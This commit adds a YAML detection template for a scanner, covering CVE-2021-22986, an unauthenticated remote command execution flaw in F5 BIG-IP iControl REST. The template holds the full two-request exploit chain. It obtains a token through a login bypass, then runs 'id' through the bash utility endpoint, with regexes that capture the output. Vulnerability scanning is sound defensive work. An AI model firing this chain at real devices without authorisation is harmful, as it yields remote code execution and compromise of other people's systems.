Create CVE-2021-22986.yaml

cves/2021/CVE-2021-22986.yaml

@@ -0,0 +1,57 @@
+id: CVE-2021-22986
+info:
+  name: F5 BIG-IP iControl REST unauthenticated RCE
+  author: rootxharsh,iamnoooob
+  severity: critical
+  tags: bigip,cve,cve2021,rce
+  description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
+  reference:
+    - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
+    - https://support.f5.com/csp/article/K03009991
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-22986
+
+requests:
+  - raw:
+      - |
+        POST /mgmt/shared/authn/login HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        Authorization: Basic YWRtaW46
+        Content-Type: application/json
+        Cookie: BIGIPAuthCookie=1234
+        Connection: close
+
+        {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
+      - |
+        POST /mgmt/tm/util/bash HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        X-F5-Auth-Token: §token§
+        Content-Type: application/json
+        Connection: close
+
+        {"command":"run","utilCmdArgs":"-c id"}
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: token
+        group: 1
+        regex:
+          - "([A-Z0-9]{26})"
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "\"commandResult\":\"(.*)\""
+
+    matchers:
+      - type: word
+        words:
+          - "commandResult"
+          - "uid="
+        condition: and